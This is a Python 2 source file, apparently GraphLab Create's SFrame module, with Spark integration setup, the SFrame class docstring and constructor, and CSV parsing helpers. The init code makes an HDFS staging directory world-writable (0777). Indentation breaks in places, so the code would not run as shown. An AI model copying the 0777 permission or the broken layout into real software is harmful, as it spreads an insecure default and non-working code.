# Logical name -> file name for every artifact Spark support requires.
SPARK_SUPPORT_NAMES = {'RDD_SFRAME_PATH':'rddtosf_pickle',
                       'RDD_SFRAME_NONPICKLE_PATH':'rddtosf_nonpickle',
                       'SFRAME_RDD_PATH':'sftordd_pickle',
                       'HDFS_LIB_PATH':'libhdfs.so',
                       'RDD_JAR_PATH':'graphlab-create-spark-integration.jar',
                       'SYS_UTIL_PY_PATH':'sys_util.py',
                       'SPARK_PIPE_WRAPPER_PATH':'spark_pipe_wrapper'}
# Probe each candidate root for the Spark-support artifacts, recording the
# first hit for every logical name in BINARY_PATHS. Stop at the first root
# that satisfies every name; if that root is the first (egg) one, treat this
# as a production install.
first = True
for i in SFRAME_ROOTS:
    for key,val in SPARK_SUPPORT_NAMES.iteritems():
        tmp_path = os.path.join(i, val)
        if key not in BINARY_PATHS and os.path.isfile(tmp_path):
            BINARY_PATHS[key] = tmp_path
    if all(name in BINARY_PATHS for name in SPARK_SUPPORT_NAMES.keys()):
        if first:
            # Everything was found in the egg layout -> production run.
            PRODUCTION_RUN = True
        break
    first = False
# If any artifact is still missing after searching all roots, RDD
# integration cannot be offered.
if not all(name in BINARY_PATHS for name in SPARK_SUPPORT_NAMES.keys()):
    RDD_SUPPORT = False
def get_spark_integration_jar_path():
    """
    Return the absolute path of the jar file required to enable GraphLab
    Create's integration with Apache Spark.

    Raises
    ------
    RuntimeError
        If no Spark integration jar was located for this installation.
    """
    # EAFP: the jar path is registered in BINARY_PATHS at import time when
    # the packaged jar was found on disk.
    try:
        return BINARY_PATHS['RDD_JAR_PATH']
    except KeyError:
        raise RuntimeError("Could not find a spark integration jar. "
                           "Does your version of GraphLab Create support Spark Integration (is it >= 1.0)?")
def __rdd_support_init__(sprk_ctx):
    """
    One-time initialization of RDD <-> SFrame translation for ``sprk_ctx``.

    Verifies the integration jar is on the driver classpath, detects the
    cluster operating system (yarn-client mode only), rewrites BINARY_PATHS
    to platform-specific binaries, determines a staging directory, and ships
    the helper binaries/jar to the cluster. Mutates the module globals
    YARN_OS, STAGING_DIR, BINARY_PATHS and RDD_SUPPORT_INITED. No-op when
    RDD support is disabled or initialization already happened.

    Raises RuntimeError when the jar is not on the driver classpath, the
    cluster OS is unsupported, no staging directory can be determined, or
    the Spark master is neither 'local*' nor 'yarn-client'.
    """
    global YARN_OS
    global RDD_SUPPORT_INITED
    global STAGING_DIR
    global BINARY_PATHS
    if not RDD_SUPPORT or RDD_SUPPORT_INITED:
        return
    # Make sure our GraphLabUtil scala functions are accessible from the driver
    try:
        tmp = sprk_ctx._jvm.org.graphlab.create.GraphLabUtil.EscapeString(sprk_ctx._jvm.java.lang.String("1,2,3,4"))
    except:
        raise RuntimeError("Could not execute RDD translation functions. "\
                "Please make sure you have started Spark "\
                "(either with spark-submit or pyspark) with the following flag set:\n"\
                "'--driver-class-path " + BINARY_PATHS['RDD_JAR_PATH']+"'\n"\
                "OR set the property spark.driver.extraClassPath in spark-defaults.conf")
    # A one-element RDD used to run probe jobs on the cluster itself.
    dummy_rdd = sprk_ctx.parallelize([1])
    if PRODUCTION_RUN and sprk_ctx.master == 'yarn-client':
        # Get cluster operating system by executing platform.system() on a
        # worker node (the driver OS may differ from the cluster OS).
        os_rdd = dummy_rdd.map(lambda x: platform.system())
        YARN_OS = os_rdd.collect()[0]
        # Set binary path: swap in the per-platform build of each binary
        # (sys_util.py is pure Python and needs no platform variant).
        for i in BINARY_PATHS.keys():
            s = BINARY_PATHS[i]
            if os.path.basename(s) == SPARK_SUPPORT_NAMES['SYS_UTIL_PY_PATH']:
                continue
            if YARN_OS == 'Linux':
                BINARY_PATHS[i] = os.path.join(os.path.dirname(s), 'linux', os.path.basename(s))
            elif YARN_OS == 'Darwin':
                BINARY_PATHS[i] = os.path.join(os.path.dirname(s), 'osx', os.path.basename(s))
            else:
                raise RuntimeError("YARN cluster has unsupported operating system "\
                        "(something other than Linux or Mac OS X). "\
                        "Cannot convert RDDs on this cluster to SFrame.")
    # Create staging directory
    staging_dir = '.graphlabStaging'
    if sprk_ctx.master == 'yarn-client':
        tmp_loc = None
        # Get that staging directory's full name by asking a worker for the
        # cluster's default filesystem URI.
        tmp_loc = dummy_rdd.map(
            lambda x: subprocess.check_output(
                ["hdfs", "getconf", "-confKey", "fs.defaultFS"]).rstrip()).collect()[0]
        STAGING_DIR = os.path.join(tmp_loc, "user", sprk_ctx.sparkUser(), staging_dir)
        if STAGING_DIR is None:
            raise RuntimeError("Failed to create a staging directory on HDFS. "\
                    "Do your cluster nodes have a working hdfs client?")
        # Actually create the staging dir (world-writable so worker-side
        # processes can write intermediate files into it).
        unity = glconnect.get_unity()
        unity.__mkdir__(STAGING_DIR)
        unity.__chmod__(STAGING_DIR, 0777)
    elif sprk_ctx.master[0:5] == 'local':
        # Save the output sframes to the same temp workspace this engine is
        # using
        #TODO: Consider cases where server and client aren't on the same machine
        unity = glconnect.get_unity()
        STAGING_DIR = unity.get_current_cache_file_location()
        if STAGING_DIR is None:
            raise RuntimeError("Could not retrieve local staging directory! \
                    Please contact us on http://forum.dato.com.")
    else:
        raise RuntimeError("Your spark context's master is '" +
                           str(sprk_ctx.master) +
                           "'. Only 'local' and 'yarn-client' are supported.")
    # Ship every helper binary (and the jar) to the cluster nodes so the
    # worker-side pipe wrapper can invoke them.
    if sprk_ctx.master == 'yarn-client':
        sprk_ctx.addFile(BINARY_PATHS['RDD_SFRAME_PATH'])
        sprk_ctx.addFile(BINARY_PATHS['HDFS_LIB_PATH'])
        sprk_ctx.addFile(BINARY_PATHS['SFRAME_RDD_PATH'])
        sprk_ctx.addFile(BINARY_PATHS['RDD_SFRAME_NONPICKLE_PATH'])
        sprk_ctx.addFile(BINARY_PATHS['SYS_UTIL_PY_PATH'])
        sprk_ctx.addFile(BINARY_PATHS['SPARK_PIPE_WRAPPER_PATH'])
        sprk_ctx._jsc.addJar(BINARY_PATHS['RDD_JAR_PATH'])
    RDD_SUPPORT_INITED = True
def load_sframe(filename):
    """
    Load an SFrame saved at ``filename``.

    The format is inferred from the filename extension; this is mainly
    useful for SFrames previously saved in binary format, in which case
    ``filename`` is the directory created by :py:meth:`SFrame.save`. For
    CSV input with non-default parsing options, prefer
    :py:meth:`SFrame.read_csv`, which offers far more control.

    Parameters
    ----------
    filename : string
        Location of the file to load. Can be a local path or a remote URL.

    Returns
    -------
    out : SFrame

    See Also
    --------
    SFrame.save, SFrame.read_csv

    Examples
    --------
    >>> sf = graphlab.SFrame({'id':[1,2,3], 'val':['A','B','C']})
    >>> sf.save('my_sframe')        # 'my_sframe' is a directory
    >>> sf_loaded = graphlab.load_sframe('my_sframe')
    """
    # SFrame's constructor performs the format dispatch.
    return SFrame(data=filename)
class SFrame(object):
"""
A tabular, column-mutable dataframe object that can scale to big data. The
data in SFrame is stored column-wise on the GraphLab Server side, and is
stored on persistent storage (e.g. disk) to avoid being constrained by
memory size. Each column in an SFrame is a size-immutable
:class:`~graphlab.SArray`, but SFrames are mutable in that columns can be
added and subtracted with ease. An SFrame essentially acts as an ordered
dict of SArrays.
Currently, we support constructing an SFrame from the following data
formats:
* csv file (comma separated value)
* sframe directory archive (A directory where an sframe was saved
previously)
* general text file (with csv parsing options, See :py:meth:`read_csv()`)
* a Python dictionary
* pandas.DataFrame
* JSON
* Apache Avro
* PySpark RDD
and from the following sources:
* your local file system
* the GraphLab Server's file system
* HDFS
* Amazon S3
* HTTP(S).
Only basic examples of construction are covered here. For more information
and examples, please see the `User Guide <https://dato.com/learn/user
guide/index.html#Working_with_data_Tabular_data>`_, `API Translator
<https://dato.com/learn/translator>`_, `How-Tos
<https://dato.com/learn/how-to>`_, and data science `Gallery
<https://dato.com/learn/gallery>`_.
Parameters
----------
data : array | pandas.DataFrame | string | dict, optional
The actual interpretation of this field is dependent on the ``format``
parameter. If ``data`` is an array or Pandas DataFrame, the contents are
stored in the SFrame. If ``data`` is a string, it is interpreted as a
file. Files can be read from local file system or urls (local://,
hdfs://, s3://, http://).
format : string, optional
Format of the data. The default, "auto" will automatically infer the
input data format. The inference rules are simple: If the data is an
array or a dataframe, it is associated with 'array' and 'dataframe'
respectively. If the data is a string, it is interpreted as a file, and
the file extension is used to infer the file format. The explicit
options are:
- "auto"
- "array"
- "dict"
- "sarray"
- "dataframe"
- "csv"
- "tsv"
- "sframe".
See Also
--------
read_csv:
Create a new SFrame from a csv file. Preferred for text and CSV formats,
because it has a lot more options for controlling the parser.
save : Save an SFrame for later use.
Notes
-----
- When working with the GraphLab EC2 instance (see
:py:func:`graphlab.aws.launch_EC2()`), an SFrame cannot be constructed
using local file path, because it involves a potentially large amount of
data transfer from client to server. However, it is still okay to use a
remote file path. See the examples below. A similar restriction applies to
:py:class:`graphlab.SGraph` and :py:class:`graphlab.SArray`.
- When reading from HDFS on Linux we must guess the location of your java
installation. By default, we will use the location pointed to by the
JAVA_HOME environment variable. If this is not set, we check many common
installation paths. You may use two environment variables to override
this behavior. GRAPHLAB_JAVA_HOME allows you to specify a specific java
installation and overrides JAVA_HOME. GRAPHLAB_LIBJVM_DIRECTORY
overrides all and expects the exact directory that your preferred
libjvm.so file is located. Use this ONLY if you'd like to use a
non-standard JVM.
Examples
--------
>>> import graphlab
>>> from graphlab import SFrame
**Construction**
Construct an SFrame from a dataframe and transfers the dataframe object
across the network.
>>> df = pandas.DataFrame()
>>> sf = SFrame(data=df)
Construct an SFrame from a local csv file (only works for local server).
>>> sf = SFrame(data='~/mydata/foo.csv')
Construct an SFrame from a csv file on Amazon S3. This requires the
environment variables: *AWS_ACCESS_KEY_ID* and *AWS_SECRET_ACCESS_KEY* to be
set before the python session started. Alternatively, you can use
:py:func:`graphlab.aws.set_credentials()` to set the credentials after
python is started and :py:func:`graphlab.aws.get_credentials()` to verify
these environment variables.
>>> sf = SFrame(data='s3://mybucket/foo.csv')
Read from HDFS using a specific java installation (environment variable
only applies when using Linux)
>>> import os
>>> os.environ['GRAPHLAB_JAVA_HOME'] = '/my/path/to/java'
>>> from graphlab import SFrame
>>> sf = SFrame("hdfs://mycluster.example.com:8020/user/myname/coolfile.txt")
An SFrame can be constructed from a dictionary of values or SArrays:
>>> sf = gl.SFrame({'id':[1,2,3],'val':['A','B','C']})
>>> sf
Columns:
id int
val str
Rows: 3
Data:
id val
0 1 A
1 2 B
2 3 C
Or equivalently:
>>> ids = SArray([1,2,3])
>>> vals = SArray(['A','B','C'])
>>> sf = SFrame({'id':ids,'val':vals})
It can also be constructed from an array of SArrays in which case column
names are automatically assigned.
>>> ids = SArray([1,2,3])
>>> vals = SArray(['A','B','C'])
>>> sf = SFrame([ids, vals])
>>> sf
Columns:
X1 int
X2 str
Rows: 3
Data:
X1 X2
0 1 A
1 2 B
2 3 C
If the SFrame is constructed from a list of values, an SFrame of a single
column is constructed.
>>> sf = SFrame([1,2,3])
>>> sf
Columns:
X1 int
Rows: 3
Data:
X1
0 1
1 2
2 3
**Parsing**
    The :py:func:`graphlab.SFrame.read_csv()` function is quite powerful and
    can be used to import a variety of row-based formats.
First, some simple cases:
>>> !cat ratings.csv
user_id,movie_id,rating
10210,1,1
10213,2,5
10217,2,2
10102,1,3
10109,3,4
10117,5,2
10122,2,4
10114,1,5
10125,1,1
>>> gl.SFrame.read_csv('ratings.csv')
Columns:
user_id int
movie_id int
rating int
Rows: 9
Data:
+---------+----------+--------+
| user_id | movie_id | rating |
+---------+----------+--------+
| 10210 | 1 | 1 |
| 10213 | 2 | 5 |
| 10217 | 2 | 2 |
| 10102 | 1 | 3 |
| 10109 | 3 | 4 |
| 10117 | 5 | 2 |
| 10122 | 2 | 4 |
| 10114 | 1 | 5 |
| 10125 | 1 | 1 |
+---------+----------+--------+
[9 rows x 3 columns]
Delimiters can be specified, if "," is not the delimiter, for instance
space ' ' in this case. Only single character delimiters are supported.
>>> !cat ratings.csv
user_id movie_id rating
10210 1 1
10213 2 5
10217 2 2
10102 1 3
10109 3 4
10117 5 2
10122 2 4
10114 1 5
10125 1 1
>>> gl.SFrame.read_csv('ratings.csv', delimiter=' ')
By default, "NA" or a missing element are interpreted as missing values.
>>> !cat ratings2.csv
user,movie,rating
"tom",,1
harry,5,
jack,2,2
bill,,
>>> gl.SFrame.read_csv('ratings2.csv')
Columns:
user str
movie int
rating int
Rows: 4
Data:
+---------+-------+--------+
| user | movie | rating |
+---------+-------+--------+
| tom | None | 1 |
| harry | 5 | None |
| jack | 2 | 2 |
| missing | None | None |
+---------+-------+--------+
[4 rows x 3 columns]
    Furthermore, thanks to the dictionary and list types, the parser can
    handle parsing of JSON-like formats.
>>> !cat ratings3.csv
business, categories, ratings
"Restaurant 1", [1 4 9 10], {"funny":5, "cool":2}
"Restaurant 2", [], {"happy":2, "sad":2}
"Restaurant 3", [2, 11, 12], {}
>>> gl.SFrame.read_csv('ratings3.csv')
Columns:
business str
categories array
ratings dict
Rows: 3
Data:
+--------------+--------------------------------+-------------------------+
| business | categories | ratings |
+--------------+--------------------------------+-------------------------+
| Restaurant 1 | array('d', [1.0, 4.0, 9.0, ... | {'funny': 5, 'cool': 2} |
| Restaurant 2 | array('d') | {'sad': 2, 'happy': 2} |
| Restaurant 3 | array('d', [2.0, 11.0, 12.0]) | {} |
+--------------+--------------------------------+-------------------------+
[3 rows x 3 columns]
The list and dictionary parsers are quite flexible and can absorb a
variety of purely formatted inputs. Also, note that the list and dictionary
types are recursive, allowing for arbitrary values to be contained.
All these are valid lists:
>>> !cat interesting_lists.csv
list
[]
[1,2,3]
[1;2,3]
[1 2 3]
[{a:b}]
["c",d, e]
[[a]]
>>> gl.SFrame.read_csv('interesting_lists.csv')
Columns:
list list
Rows: 7
Data:
+-----------------+
| list |
+-----------------+
| [] |
| [1, 2, 3] |
| [1, 2, 3] |
| [1, 2, 3] |
| [{'a': 'b'}] |
| ['c', 'd', 'e'] |
| [['a']] |
+-----------------+
[7 rows x 1 columns]
All these are valid dicts:
>>> !cat interesting_dicts.csv
dict
{"classic":1,"dict":1}
{space:1 seperated:1}
{emptyvalue:}
{}
{:}
{recursive1:[{a:b}]}
{:[{:[a]}]}
>>> gl.SFrame.read_csv('interesting_dicts.csv')
Columns:
dict dict
Rows: 7
Data:
+------------------------------+
| dict |
+------------------------------+
| {'dict': 1, 'classic': 1} |
| {'seperated': 1, 'space': 1} |
| {'emptyvalue': None} |
| {} |
| {None: None} |
| {'recursive1': [{'a': 'b'}]} |
| {None: [{None: array('d')}]} |
+------------------------------+
[7 rows x 1 columns]
**Saving**
Save and load the sframe in native format.
>>> sf.save('mysframedir')
>>> sf2 = graphlab.load_sframe('mysframedir')
    **Column Manipulation**
An SFrame is composed of a collection of columns of SArrays, and individual
SArrays can be extracted easily. For instance given an SFrame:
>>> sf = SFrame({'id':[1,2,3],'val':['A','B','C']})
>>> sf
Columns:
id int
val str
Rows: 3
Data:
id val
0 1 A
1 2 B
2 3 C
The "id" column can be extracted using:
>>> sf["id"]
dtype: int
Rows: 3
[1, 2, 3]
And can be deleted using:
>>> del sf["id"]
Multiple columns can be selected by passing a list of column names:
>>> sf = SFrame({'id':[1,2,3],'val':['A','B','C'],'val2':[5,6,7]})
>>> sf
Columns:
id int
val str
val2 int
Rows: 3
Data:
id val val2
0 1 A 5
1 2 B 6
2 3 C 7
>>> sf2 = sf[['id','val']]
>>> sf2
Columns:
id int
val str
Rows: 3
Data:
id val
0 1 A
1 2 B
2 3 C
The same mechanism can be used to re-order columns:
>>> sf = SFrame({'id':[1,2,3],'val':['A','B','C']})
>>> sf
Columns:
id int
val str
Rows: 3
Data:
id val
0 1 A
1 2 B
2 3 C
>>> sf[['val','id']]
>>> sf
Columns:
val str
id int
Rows: 3
Data:
val id
0 A 1
1 B 2
2 C 3
**Element Access and Slicing**
SFrames can be accessed by integer keys just like a regular python list.
Such operations may not be fast on large datasets so looping over an SFrame
should be avoided.
>>> sf = SFrame({'id':[1,2,3],'val':['A','B','C']})
>>> sf[0]
{'id': 1, 'val': 'A'}
>>> sf[2]
{'id': 3, 'val': 'C'}
>>> sf[5]
IndexError: SFrame index out of range
Negative indices can be used to access elements from the tail of the array
>>> sf[-1] # returns the last element
{'id': 3, 'val': 'C'}
>>> sf[-2] # returns the second to last element
{'id': 2, 'val': 'B'}
The SFrame also supports the full range of python slicing operators:
>>> sf[1000:] # Returns an SFrame containing rows 1000 to the end
>>> sf[:1000] # Returns an SFrame containing rows 0 to row 999 inclusive
>>> sf[0:1000:2] # Returns an SFrame containing rows 0 to row 1000 in steps of 2
>>> sf[-100:] # Returns an SFrame containing last 100 rows
>>> sf[-100:len(sf):2] # Returns an SFrame containing last 100 rows in steps of 2
**Logical Filter**
An SFrame can be filtered using
>>> sframe[binary_filter]
where sframe is an SFrame and binary_filter is an SArray of the same length.
The result is a new SFrame which contains only rows of the SFrame where its
matching row in the binary_filter is non zero.
This permits the use of boolean operators that can be used to perform
logical filtering operations. For instance, given an SFrame
>>> sf
Columns:
id int
val str
Rows: 3
Data:
id val
0 1 A
1 2 B
2 3 C
>>> sf[(sf['id'] >= 1) & (sf['id'] <= 2)]
Columns:
id int
val str
Rows: 3
Data:
id val
0 1 A
1 2 B
See :class:`~graphlab.SArray` for more details on the use of the logical
filter.
This can also be used more generally to provide filtering capability which
is otherwise not expressible with simple boolean functions. For instance:
>>> sf[sf['id'].apply(lambda x: math.log(x) <= 1)]
Columns:
id int
val str
Rows: 3
Data:
id val
0 1 A
1 2 B
Or alternatively:
>>> sf[sf.apply(lambda x: math.log(x['id']) <= 1)]
Create an SFrame from a Python dictionary.
>>> from graphlab import SFrame
>>> sf = SFrame({'id':[1,2,3], 'val':['A','B','C']})
>>> sf
Columns:
id int
val str
Rows: 3
Data:
id val
0 1 A
1 2 B
2 3 C
"""
__slots__ = ['shape', '__proxy__', '_proxy']
    def __init__(self, data=None,
                 format='auto',
                 _proxy=None):
        """__init__(data=list(), format='auto')
        Construct a new SFrame from a url, a pandas.DataFrame, a dict of
        SArrays/lists, a list, an SArray, or another SFrame.

        Parameters are documented on the class docstring. ``_proxy`` is an
        internal parameter used to wrap an existing server-side proxy.
        """
        # emit metrics for num_rows, num_columns, and type (local://, s3, hdfs, http)
        tracker = _mt._get_metric_tracker()
        # Reuse an existing server-side proxy when one is supplied (internal
        # fast path); otherwise allocate a fresh one on the connected server.
        if (_proxy):
            self.__proxy__ = _proxy
        else:
            self.__proxy__ = UnitySFrameProxy(glconnect.get_client())
        _format = None
        if (format == 'auto'):
            # Infer the input format from the data's Python type, or -- for
            # string data -- from the path's extension.
            if (HAS_PANDAS and isinstance(data, pandas.DataFrame)):
                _format = 'dataframe'
                tracker.track('sframe.location.memory', value=1)
            elif (isinstance(data, str) or isinstance(data, unicode)):
                # Track where the file lives: 'local' or the URL scheme
                # (s3, hdfs, http, ...).
                if data.find('://') == -1:
                    suffix = 'local'
                else:
                    suffix = data.split('://')[0]
                tracker.track(('sframe.location.%s' % (suffix)), value=1)
                if data.endswith(('.csv', '.csv.gz')):
                    _format = 'csv'
                elif data.endswith(('.tsv', '.tsv.gz')):
                    _format = 'tsv'
                elif data.endswith(('.txt', '.txt.gz')):
                    print "Assuming file is csv. For other delimiters, " + \
                        "please use `SFrame.read_csv`."
                    _format = 'csv'
                else:
                    # Any other path is assumed to be a saved SFrame directory.
                    _format = 'sframe'
            elif type(data) == SArray:
                _format = 'sarray'
            elif isinstance(data, SFrame):
                _format = 'sframe_obj'
            elif (hasattr(data, 'iteritems')):
                # Duck-typed dict (Python 2 mapping protocol).
                _format = 'dict'
                tracker.track('sframe.location.memory', value=1)
            elif hasattr(data, '__iter__'):
                _format = 'array'
                tracker.track('sframe.location.memory', value=1)
            elif data is None:
                _format = 'empty'
            else:
                raise ValueError('Cannot infer input type for data ' + str(data))
        else:
            _format = format
        tracker.track(('sframe.format.%s' % _format), value=1)
        # Dispatch on the resolved format and populate the proxy.
        with cython_context():
            if (_format == 'dataframe'):
                self.__proxy__.load_from_dataframe(data)
            elif (_format == 'sframe_obj'):
                # Share the source SFrame's column proxies (shallow copy).
                for col in data.column_names():
                    self.__proxy__.add_column(data[col].__proxy__, col)
            elif (_format == 'sarray'):
                self.__proxy__.add_column(data.__proxy__, "")
            elif (_format == 'array'):
                if len(data) > 0:
                    unique_types = set([type(x) for x in data if x is not None])
                    if len(unique_types) == 1 and SArray in unique_types:
                        # A list of SArrays: one column per SArray, with
                        # auto-assigned names (X1, X2, ...).
                        for arr in data:
                            self.add_column(arr)
                    elif SArray in unique_types:
                        raise ValueError("Cannot create SFrame from mix of regular values and SArrays")
                    else:
                        # A flat list of values becomes one unnamed column.
                        self.__proxy__.add_column(SArray(data).__proxy__, "")
            elif (_format == 'dict'):
                # Sort keys so column order is deterministic across runs.
                for key,val in iter(sorted(data.iteritems())):
                    if (type(val) == SArray):
                        self.__proxy__.add_column(val.__proxy__, key)
                    else:
                        self.__proxy__.add_column(SArray(val).__proxy__, key)
            elif (_format == 'csv'):
                url = _make_internal_url(data)
                tmpsf = SFrame.read_csv(url, delimiter=',', header=True)
                self.__proxy__ = tmpsf.__proxy__
            elif (_format == 'tsv'):
                url = _make_internal_url(data)
                tmpsf = SFrame.read_csv(url, delimiter='\t', header=True)
                self.__proxy__ = tmpsf.__proxy__
            elif (_format == 'sframe'):
                url = _make_internal_url(data)
                self.__proxy__.load_from_sframe_index(url)
            elif (_format == 'empty'):
                pass
            else:
                raise ValueError('Unknown input type: ' + format)
        # Report the resulting size; -1 when the SFrame is lazily evaluated
        # and its row count is not yet known.
        sframe_size = -1
        if self.__has_size__():
            sframe_size = self.num_rows()
        tracker.track('sframe.row.size', value=sframe_size)
        tracker.track('sframe.col.size', value=self.num_cols())
    @staticmethod
    def _infer_column_types_from_lines(first_rows):
        """
        Infer a per-column type list from a small sample SFrame.

        Parameters
        ----------
        first_rows : SFrame
            A sample of already-parsed rows (the first rows of the file,
            parsed with no type hints).

        Returns
        -------
        list of type, or the single type ``str`` when inference fails
        because the sampled rows disagree on the number of elements.

        Raises
        ------
        RuntimeError
            If the sample has no columns or no rows.
        """
        if (len(first_rows.column_names()) < 1):
            print "Insufficient number of columns to perform type inference"
            raise RuntimeError("Insufficient columns ")
        if len(first_rows) < 1:
            print "Insufficient number of rows to perform type inference"
            raise RuntimeError("Insufficient rows")
        # gets all the values column-wise
        all_column_values_transposed = [list(first_rows[col])
                for col in first_rows.column_names()]
        # transpose so each entry holds one row's values
        all_column_values = [list(x) for x in zip(*all_column_values_transposed)]
        # per row, the type of every cell
        all_column_type_hints = [[type(t) for t in vals] for vals in all_column_values]
        # collect the hints
        # if every line was inferred to have a different number of elements, die
        if len(set(len(x) for x in all_column_type_hints)) != 1:
            print "Unable to infer column types. Defaulting to str"
            return str
        import types
        # start from the first row's types ...
        column_type_hints = all_column_type_hints[0]
        # now perform type combining across rows
        for i in range(1, len(all_column_type_hints)):
            currow = all_column_type_hints[i]
            for j in range(len(column_type_hints)):
                # combine types
                d = set([currow[j], column_type_hints[j]])
                if (len(d) == 1):
                    # easy case. both agree on the type
                    continue
                if ((int in d) and (float in d)):
                    # one is an int, one is a float. its a float
                    column_type_hints[j] = float
                elif ((array.array in d) and (list in d)):
                    # one is an array , one is a list. its a list
                    column_type_hints[j] = list
                elif types.NoneType in d:
                    # one is a NoneType. assign to other type
                    if currow[j] != types.NoneType:
                        column_type_hints[j] = currow[j]
                else:
                    # irreconcilable types fall back to str
                    column_type_hints[j] = str
        # final pass. everything which is still NoneType is now a str
        for i in range(len(column_type_hints)):
            if column_type_hints[i] == types.NoneType:
                column_type_hints[i] = str
        return column_type_hints
    @classmethod
    def _read_csv_impl(cls,
                       url,
                       delimiter=',',
                       header=True,
                       error_bad_lines=False,
                       comment_char='',
                       escape_char='\\',
                       double_quote=True,
                       quote_char='\"',
                       skip_initial_space=True,
                       column_type_hints=None,
                       na_values=["NA"],
                       nrows=None,
                       verbose=True,
                       store_errors=True):
        """
        Constructs an SFrame from a CSV file or a path to multiple CSVs, and
        returns a pair containing the SFrame and optionally
        (if store_errors=True) a dict of filenames to SArrays
        indicating for each file, what are the incorrectly parsed lines
        encountered.

        Parameters
        ----------
        store_errors : bool
            If true, the output errors dict will be filled.

        See `read_csv` for the rest of the parameters.
        """
        # Collect all parser options into the config dict handed to the
        # server-side CSV parser.
        parsing_config = dict()
        parsing_config["delimiter"] = delimiter
        parsing_config["use_header"] = header
        parsing_config["continue_on_failure"] = not error_bad_lines
        parsing_config["comment_char"] = comment_char
        parsing_config["escape_char"] = escape_char
        parsing_config["double_quote"] = double_quote
        parsing_config["quote_char"] = quote_char
        parsing_config["skip_initial_space"] = skip_initial_space
        parsing_config["store_errors"] = store_errors
        if type(na_values) is str:
            na_values = [na_values]
        if na_values is not None and len(na_values) > 0:
            parsing_config["na_values"] = na_values
        if nrows != None:
            parsing_config["row_limit"] = nrows
        proxy = UnitySFrameProxy(glconnect.get_client())
        internal_url = _make_internal_url(url)
        if (not verbose):
            glconnect.get_client().set_log_progress(False)
        # Attempt to automatically detect the column types. Either produce a
        # list of types; otherwise default to all str types.
        column_type_inference_was_used = False
        if column_type_hints is None:
            try:
                # Get the first 100 rows (using all the desired arguments).
                first_rows = graphlab.SFrame.read_csv(url, nrows=100,
                                 column_type_hints=type(None),
                                 header=header,
                                 delimiter=delimiter,
                                 comment_char=comment_char,
                                 escape_char=escape_char,
                                 double_quote=double_quote,
                                 quote_char=quote_char,
                                 skip_initial_space=skip_initial_space,
                                 na_values = na_values)
                column_type_hints = SFrame._infer_column_types_from_lines(first_rows)
                typelist = '[' + ','.join(t.__name__ for t in column_type_hints) + ']'
                print "------------------------------------------------------"
                print "Inferred types from first line of file as "
                print "column_type_hints="+ typelist
                print "If parsing fails due to incorrect types, you can correct"
                print "the inferred type list above and pass it to read_csv in"
                print "the column_type_hints argument"
                print "------------------------------------------------------"
                column_type_inference_was_used = True
            except Exception as e:
                # A user cancellation must propagate; any other inference
                # failure falls back to parsing every column as str.
                if type(e) == RuntimeError and "CSV parsing cancelled" in e.message:
                    raise e
                # If the above fails, default back to str for all columns.
                column_type_hints = str
                print 'Could not detect types. Using str for each column.'
        # Normalize the three accepted hint shapes (single type, list of
        # types, dict of column name -> type) into the proxy's dict form.
        if type(column_type_hints) is type:
            type_hints = {'__all_columns__': column_type_hints}
        elif type(column_type_hints) is list:
            type_hints = dict(zip(['__X%d__' % i for i in range(len(column_type_hints))], column_type_hints))
        elif type(column_type_hints) is dict:
            type_hints = column_type_hints
        else:
            raise TypeError("Invalid type for column_type_hints. Must be a dictionary, list or a single type.")
        _mt._get_metric_tracker().track('sframe.csv.parse')
        # Track where the file lives: 'local' or the URL scheme (s3, ...).
        suffix=''
        if url.find('://') == -1:
            suffix = 'local'
        else:
            suffix = url.split('://')[0]
        _mt._get_metric_tracker().track(('sframe.location.%s' % (suffix)), value=1)
        try:
            with cython_context():
                errors = proxy.load_from_csvs(internal_url, parsing_config, type_hints)
        except Exception as e:
            if type(e) == RuntimeError and "CSV parsing cancelled" in e.message:
                raise e
            if column_type_inference_was_used:
                # try again, this time forcing every column to str
                print "Unable to parse the file with automatic type inference."
                print "Defaulting to column_type_hints=str"
                type_hints = {'__all_columns__': str}
                try:
                    with cython_context():
                        errors = proxy.load_from_csvs(internal_url, parsing_config, type_hints)
                except:
                    raise
            else:
                raise
        glconnect.get_client().set_log_progress(True)
        # Wrap the populated proxy and the per-file error SArrays.
        return (cls(_proxy=proxy), { f: SArray(_proxy = es) for (f, es) in errors.iteritems() })
@classmethod
def read_csv_with_errors(cls,
url,
delimiter=',',
header=True,
comment_char='',
escape_char='\\',
double_quote=True,
quote_char='\"',
skip_initial_space=True,
column_type_hints=None,
na_values=["NA"],
nrows=None,
verbose=True):
"""
Constructs an SFrame from a CSV file or a path to multiple CSVs, and
returns a pair containing the SFrame and a dict of filenames to SArrays
indicating for each file, what are the incorrectly parsed lines
encountered.
Parameters
----------
url : string
Location of the CSV file or directory to load. If URL is a directory
or a "glob" pattern, all matching files will be loaded.
delimiter : string, optional
This describes the delimiter used for parsing csv files.
header : bool, optional
If true, uses the first row as the column names. Otherwise use the
default column names: 'X1, X2, ...'.
comment_char : string, optional
The character which denotes that the
remainder of the line is a comment.
escape_char : string, optional
Character which begins a C escape sequence
double_quote : bool, optional
If True, two consecutive quotes in a string are parsed to a single
quote.
quote_char : string, optional
Character sequence that indicates a quote.
skip_initial_space : bool, optional
Ignore extra spaces at the start of a field
column_type_hints : None, type, list[type], dict[string, type], optional
This provides type hints for each column. By default, this method
attempts to detect the type of each column automatically.
Supported types are int, float, str, list, dict, and array.array.
* If a single type is provided, the type will be
applied to all columns. For instance, column_type_hints=float
will force all columns to be parsed as float.
* If a list of types is provided, the types applies
to each column in order, e.g.[int, float, str]
will parse the first column as int, second as float and third as
string.
* If a dictionary of column name to type is provided,
each type value in the dictionary is applied to the key it
belongs to.
For instance {'user':int} will hint that the column called "user"
should be parsed as an integer, and the rest will default to
string.
na_values : str | list of str, optional
A string or list of strings to be interpreted as missing values.
nrows : int, optional
If set, only this many rows will be read from the file.
verbose : bool, optional
If True, print the progress.
Returns
-------
out : tuple
The first element is the SFrame with good data. The second element
is a dictionary of filenames to SArrays indicating for each file,
what are the incorrectly parsed lines encountered.
See Also
--------
read_csv, SFrame
Examples
--------
>>> bad_url = 'https://s3.amazonaws.com/gl-testdata/bad_csv_example.csv'
>>> (sf, bad_lines) = graphlab.SFrame.read_csv_with_errors(bad_url)
>>> sf
+---------+----------+--------+
| user_id | movie_id | rating |
+---------+----------+--------+
| 25904 | 1663 | 3 |
| 25907 | 1663 | 3 |
| 25923 | 1663 | 3 |
| 25924 | 1663 | 3 |
| 25928 | 1663 | 2 |
| ... | ... | ... |
+---------+----------+--------+
[98 rows x 3 columns]
>>> bad_lines
